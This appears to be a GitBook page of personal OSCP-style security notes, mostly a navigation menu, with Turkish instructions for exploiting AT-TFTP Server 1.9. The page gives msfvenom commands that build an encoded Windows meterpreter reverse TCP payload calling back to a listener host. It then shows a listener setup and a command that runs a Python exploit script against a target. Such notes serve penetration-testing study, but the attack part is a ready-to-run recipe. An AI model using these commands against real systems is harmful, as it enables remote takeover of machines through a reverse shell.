messy security notes
  • security is an illision
  • Useful Blog Links
  • Windows
    • ad-101
    • MS17-010
    • SMB
    • Post Exploitation Tricks
    • DCOM/RPC
    • Basic Commands
    • SMB Enumeration
  • Linux
    • SUID Set Edilmiş servicectl Abuse Etme
    • sudoers dosyası bozulursa?
    • SSH Welcome Message and Banner
    • pkexec ve pkttyagent
    • vipw , vigr , visudo
    • IP Forwarding
    • İki NIC Arasında Port Yönlendirme
    • tasksel
    • LAMP
    • Find All SUID Bit
    • Linux Operatorler
    • IFS
    • Ssh Public Key Tricks
    • Local & Remote Port Forwarding
    • Linux Priv Esc
    • Static IP
  • POST EXPLOITATION
    • from external network to domain admin
    • post exp 2
  • OSCP
  • Temel Komutlar ve Araçlar
  • Zayıf Servisler
  • Örnek Bir Senaryo
  • Parola Saldırıları
  • ms17-010 python exploit
  • Full Interactive Shell
  • Notes*
  • Apache James Server 2.3.2 Exploit
  • windows exploit suggester
  • FreeBsd and Some PHP tricks
  • fundamental blog
  • Metasoloit & Meterpreter & msfvenom
  • at-tftp server 1.9
  • Tunneling and Forwarding
  • Common Exploits
  • Windows Servisler
  • Execute process as another user
  • Teorik
    • Authentication and Authorization
    • Kullanıcı Hesap Türleri ve Hakları
    • Kerberos
  • SYSTEM
    • Apache2
    • Bind9 Log
    • apache - basic auth - proxy
  • Buffer Overflow - BOF
    • BOF - Stack Based
    • BoF Links
  • BASH SCRIPTING
    • Samples
  • keepnote
  • Docker
    • Docker
  • Misc
    • 50-cloud-init.yaml
Powered by GitBook
On this page

Was this helpful?

at-tftp server 1.9

Exploit : AT-TFTP Server 1.9

PreviousMetasoloit & Meterpreter & msfvenomNextTunneling and Forwarding

Last updated 5 years ago

Was this helpful?

# printf '\x81\xec\xac\x0d\x00\x00' > payload
# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.11.11 LPORT=4433 -a x86 --platform Windows -e generic/none -f raw >> payload

Aşağıdaki komut ile beraber çıkan çıktıyı python dosyasında yer alan payload değişkenine set et.
# cat payload | msfvenom -p - -e x86/shikata_ga_nai -b "\x00" -f c -e x86/shikata_ga_nai -a x86 --platform Windows


Daha sonra multi/handler üzerinden port dinleme moduna alınır ve aşağıdaki komut ile python dosyası çalıştırılır.
# python telesynftp.py 10.11.11.13 69 10.11.11.11 10
Python Exploit File